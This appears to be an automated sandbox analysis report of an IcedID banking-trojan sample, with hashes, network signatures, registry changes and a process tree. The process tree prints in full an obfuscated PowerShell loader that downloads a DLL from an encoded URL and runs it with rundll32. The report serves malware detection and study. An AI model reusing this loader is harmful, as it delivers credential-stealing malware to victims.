icedid | 56fea1fea906e0f79b7d1d403c45fe5210a0431bb09bd02c0ebe4963c8378bff

Resubmissions

06-07-2022 21:32

220706-1d4amsbfa8 10

06-07-2022 21:30

220706-1ck3nsbeh6 1

Analysis

max time kernel
72s
max time network
77s
platform
windows10_x64
resource
win10-20220414-en
submitted
06-07-2022 21:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

edde74a64c844a5508f3fd19a6f4ce5f5ae9226b4a41b806aee4ea4640b5ebd3.html
Size

107KB
MD5

54f62d23772b2788189852b979dae2a6
SHA1

7221fa92302e9e235b8fde46da3447656c0d00e1
SHA256

edde74a64c844a5508f3fd19a6f4ce5f5ae9226b4a41b806aee4ea4640b5ebd3
SHA512

9d49f94952c653943a3f6aebb0b0a6749332303197afb696b72adb7fff4f5be793d24d2f28b97c52803a2e669412444f0a8a39d3302e1189702b124c420b81c1

Score

10^/10

icedid 1487191074 banker suricata trojan

Malware Config

Extracted

Family

icedid

Campaign

1487191074

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exerundll32.exe

flow pid process

24 4888 powershell.exe
29 5000 rundll32.exe
Downloads MZ/PE file
Loads dropped DLL 2 IoCs

Processes:

rundll32.exerundll32.exe

pid process

1944 rundll32.exe
5000 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
24	4888	powershell.exe
29	5000	rundll32.exe

pid	process
1944	rundll32.exe
5000	rundll32.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30664dd49091d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a0091452196c9542a15fe3a68c71684500000000020000000000106600000001000020000000542f65d8e7ce2d8ddad7207d88b8260c4d55ccea3437769f9c7efccbef69d128000000000e8000000002000020000000b138eec7a9c969091ad26ae42607de900ce43bbc5b28cdd56c44df55fccf557510000000cc47e66620b9dd8e11b5e651679ba87040000000f7f2a90d65dd90ea3c1628375946c5fb41bc9d9b2b98703d6bc34b3a3934e509a0290bf352b5e9fdba1a0121597353e9b16e98ef0a65a6807b242b976897bbf4	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30970256"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz!	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "363931958"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a0091452196c9542a15fe3a68c71684500000000020000000000106600000001000020000000727b641043ed64fe568042b04c1717a14f392cad666693a6d4197bd2f698be96000000000e800000000200002000000059943f2fef58678fe144150ab75a3bd982b6b074e43ebd7509827e79cefe00385000000078ed8a7e2cf6bf837f6af13866a3dc3cd9ce6ed90eb05cdd396f544e28f9b934b366ed9c506df6031d42e98228c535fb47f22bb67101e922002a5779b49dbfea34861075453fec1e0e2013f68c986cfd400000002b55b94d34eb181bf1784cd293fdbb089583d6589e78e1602f3021479f7ccca0637cd26ae1800dac13328070db05e45f39fc40b908d4eac1aa337ecee849403f	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes\Version = "5"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30970256"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3541382316"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\User Preferences	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL = "http://www.bing.com/favicon.ico"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3541382316"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoURL = "http://go.microsoft.com/fwlink/?LinkID=403856&language={language}&scale={scalelevel}&contrast={contrast}"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3552162829"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "363915364"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FEA97205-FD83-11EC-A996-DEB50DF34431} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a0091452196c9542a15fe3a68c71684500000000020000000000106600000001000020000000b6ea366d3a010da107178d296ada61f67531e0e7c82bba939677592372f28109000000000e80000000020000200000000e412daf2a5388bac8d9deb34b6fbe92b058f66b205fae2f5f58baec650dab1620000000ed7f1fa18597e5d8fc128281dde0de6fc46536150227ac734ae1b1feed5475bd400000008dcc995bf33df29a349963598e24f45f85ce121854d97e69d5fed4f12ff1182acdb2ff4a2bdcf10fc5951c634644214a1305bfe63a10a3f8a5e66ce6d5b389fd	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30970256"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTSuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&market={language}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IENTSS"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a0091452196c9542a15fe3a68c71684500000000020000000000106600000001000020000000629f2da2f7c9662f2ff7cbefc2e5debe16108c416910694e1ca3ac8aee847d71000000000e800000000200002000000093783201213509c272d486012060eabc961af3814be54c6b340f49b50ebfd82c20000000e99f851d84fe4c51f1a3d7096d9e4857e58b1570df0a29cd2a7bbddf0ca4074540000000d31c2178793453fbce0aa298d9d537ce781f5652ec299632b8c50edbb8a9031cccb4f44dc7c34fd8f927e94b1dcb042a9bf8d4b6b310847ee8b6da35f81d087f	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\FlipAhead	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "363963950"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTTopResultURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60353fd49091d801	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}	iexplore.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exerundll32.exe

pid process

4888 powershell.exe
4888 powershell.exe
4888 powershell.exe
5000 rundll32.exe
5000 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4888 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

3236 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

3236 iexplore.exe
3236 iexplore.exe
2924 IEXPLORE.EXE
2924 IEXPLORE.EXE
2924 IEXPLORE.EXE
2924 IEXPLORE.EXE

pid	process
4888	powershell.exe
4888	powershell.exe
4888	powershell.exe
5000	rundll32.exe
5000	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	4888	powershell.exe

pid	process
3236	iexplore.exe

pid	process
3236	iexplore.exe
3236	iexplore.exe
2924	IEXPLORE.EXE
2924	IEXPLORE.EXE
2924	IEXPLORE.EXE
2924	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

iexplore.exemshta.exepowershell.exerundll32.exe

description	pid	process	target process
PID 3236 wrote to memory of 2924	3236	iexplore.exe	IEXPLORE.EXE
PID 3236 wrote to memory of 2924	3236	iexplore.exe	IEXPLORE.EXE
PID 3236 wrote to memory of 2924	3236	iexplore.exe	IEXPLORE.EXE
PID 3572 wrote to memory of 4888	3572	mshta.exe	powershell.exe
PID 3572 wrote to memory of 4888	3572	mshta.exe	powershell.exe
PID 3572 wrote to memory of 4888	3572	mshta.exe	powershell.exe
PID 4888 wrote to memory of 1944	4888	powershell.exe	rundll32.exe
PID 4888 wrote to memory of 1944	4888	powershell.exe	rundll32.exe
PID 4888 wrote to memory of 1944	4888	powershell.exe	rundll32.exe
PID 1944 wrote to memory of 5000	1944	rundll32.exe	rundll32.exe
PID 1944 wrote to memory of 5000	1944	rundll32.exe	rundll32.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\edde74a64c844a5508f3fd19a6f4ce5f5ae9226b4a41b806aee4ea4640b5ebd3.html
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3236

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3236 CREDAT:82945 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2924

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1452

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\edde74a64c844a5508f3fd19a6f4ce5f5ae9226b4a41b806aee4ea4640b5ebd3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Suspicious use of WriteProcessMemory
PID:3572

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function yZbcXvkcLg($LLkdVLElOUeW, $uLNHjNxJXPVJF){[IO.File]::WriteAllBytes($LLkdVLElOUeW, $uLNHjNxJXPVJF)};function CCQHIDjrZtGIu($LLkdVLElOUeW){if($LLkdVLElOUeW.EndsWith((rRZbdOmb @(71042,71096,71104,71104))) -eq $True){Start-Process (rRZbdOmb @(rundll32.exe $LLkdVLElOUeW ,PluginInit ))}elseif($LLkdVLElOUeW.EndsWith((rRZbdOmb @(71042,71108,71111,71045))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $LLkdVLElOUeW}else{Start-Process $LLkdVLElOUeW}};function BHEbPBECdSNxaWMge($yZbcXvkcLg){$KPfYWdcFroGI=(rRZbdOmb @(71068,71101,71096,71096,71097,71106));$rNhEkRAjLlqUhAowwfa=(Get-ChildItem $yZbcXvkcLg -Force);$rNhEkRAjLlqUhAowwfa.Attributes=$rNhEkRAjLlqUhAowwfa.Attributes -bor ([IO.FileAttributes]$KPfYWdcFroGI).value__};function ePOQLWeCI($wqaYSIodFQue){$VSHypWfkwlGXdXnBrxg = New-Object (rRZbdOmb @(71074,71097,71112,71042,71083,71097,71094,71063,71104,71101,71097,71106,71112));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$uLNHjNxJXPVJF = $VSHypWfkwlGXdXnBrxg.DownloadData($wqaYSIodFQue);return $uLNHjNxJXPVJF};function rRZbdOmb($EpQwPiWYJkxY){$xrwJw=70996;$GRWAzRMKj=$Null;foreach($DuvUmmIkqpEVrQS in $EpQwPiWYJkxY){$GRWAzRMKj+=[char]($DuvUmmIkqpEVrQS-$xrwJw)};return $GRWAzRMKj};function xVzzNJghOqvZafF(){$XElgfcdoyKQN = $env:ProgramData + '\';$ZZQbhovWgp = $XElgfcdoyKQN + '1.dll'; if (Test-Path -Path $ZZQbhovWgp){CCQHIDjrZtGIu $ZZQbhovWgp;}Else{ $NCmFpKAZUEYK = ePOQLWeCI (rRZbdOmb @(71100,71112,71112,71108,71054,71043,71043,71095,71107,71105,71110,71093,71096,71097,71111,71108,71107,71107,71106,71042,71095,71107,71105,71043,71045,71042,71096,71104,71104));yZbcXvkcLg $ZZQbhovWgp $NCmFpKAZUEYK;CCQHIDjrZtGIu $ZZQbhovWgp;};BHEbPBECdSNxaWMge $ZZQbhovWgp;;;;;}xVzzNJghOqvZafF;
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4888

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\ProgramData\1.dll PluginInit
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1944

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\ProgramData\1.dll PluginInit
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5000

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\1.dll
Filesize
813KB

MD5
35999cd6417ae33f264178adb800d560

SHA1
74276d57902e683fbcddb313cb34b0f92bcb52df

SHA256
1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

SHA512
78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize
471B

MD5
f46df6d8b4b4db4e1dc315559df90120

SHA1
6e276344ce29422caf44382d1976bca7bf06c6ed

SHA256
202f370ff58874e4e5e56ff634031c48ef1ee599db976ebd25790c65f8780ac2

SHA512
b32a203bfaabef4763f1c0de9398d52da1465c234b82da541e9987d5114efae93e391d8437018f0c34d70464d5c9b1fb3c084b3adb5ad430f7cb3459aed42706

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize
404B

MD5
c7ce77d13c892f066e844602e28ff91a

SHA1
9cbf0ba0fe805373d8fb0e08ea22c12942cf4036

SHA256
5d3ad9dfd1994b2fabf91aedf2b906ea2c3280f1e0b6825c259f0c140e27de91

SHA512
5f741c117845c3ec7699114db50d7d6df8402a1e64f8f0ae465ad6b67beecf4fd0581bbc24287c4dcafb4d1337b61e0071ac21e5b913e99c4b0d6f36ae98c3ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\I0N0HPK8.cookie
Filesize
243B

MD5
6751414d3e813f08796555d6992379c4

SHA1
a526a7afafb8ef8ee9326911a525d875dfbad87d

SHA256
75cc04da3cb3ddf35e5cb73aef3a7f1a5fd0f9000ae6df6abedcd09986405b50

SHA512
bcd8dafb48e7d0e0a5b1663089fac34657b0c4d4344b3f3cf19248951460606285ab4293013970abdd7d3bd94fe9fc0ba0fba061a0ff0a0458fee53e8c9093af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\KUTQJ1FB.cookie
Filesize
614B

MD5
8252150ed302fca811012bff3d9a18d5

SHA1
6f47d6ecffd7b09612afba5cf0e018588a076bc7

SHA256
e6f274f2212a20e3146c746cf89e583c24965370dfbaae7646f93f9765c39766

SHA512
1b7149905f5aba9f1b8e1b533965c0a7631cc5af472a5fd61c76f070c6d0d3b07c6f85795a4df38a381d5e7490837f016efd986689cf5981394883e46ba317d7

Download Submit
\ProgramData\1.dll
Filesize
813KB

MD5
35999cd6417ae33f264178adb800d560

SHA1
74276d57902e683fbcddb313cb34b0f92bcb52df

SHA256
1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

SHA512
78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

Download Submit
\ProgramData\1.dll
Filesize
813KB

MD5
35999cd6417ae33f264178adb800d560

SHA1
74276d57902e683fbcddb313cb34b0f92bcb52df

SHA256
1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

SHA512
78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

Download Submit
memory/1944-306-0x0000000000000000-mapping.dmp

Download
memory/3572-152-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-156-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-120-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-121-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-122-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-123-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-124-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-125-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-126-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-129-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-128-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-130-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-127-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-131-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-132-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-133-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-134-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-136-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-137-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-138-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-135-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-139-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-140-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
memory/3572-141-0x0000000076F70000-0x00000000770FE000-memory.dmp

Filesize
1.6MB

Download
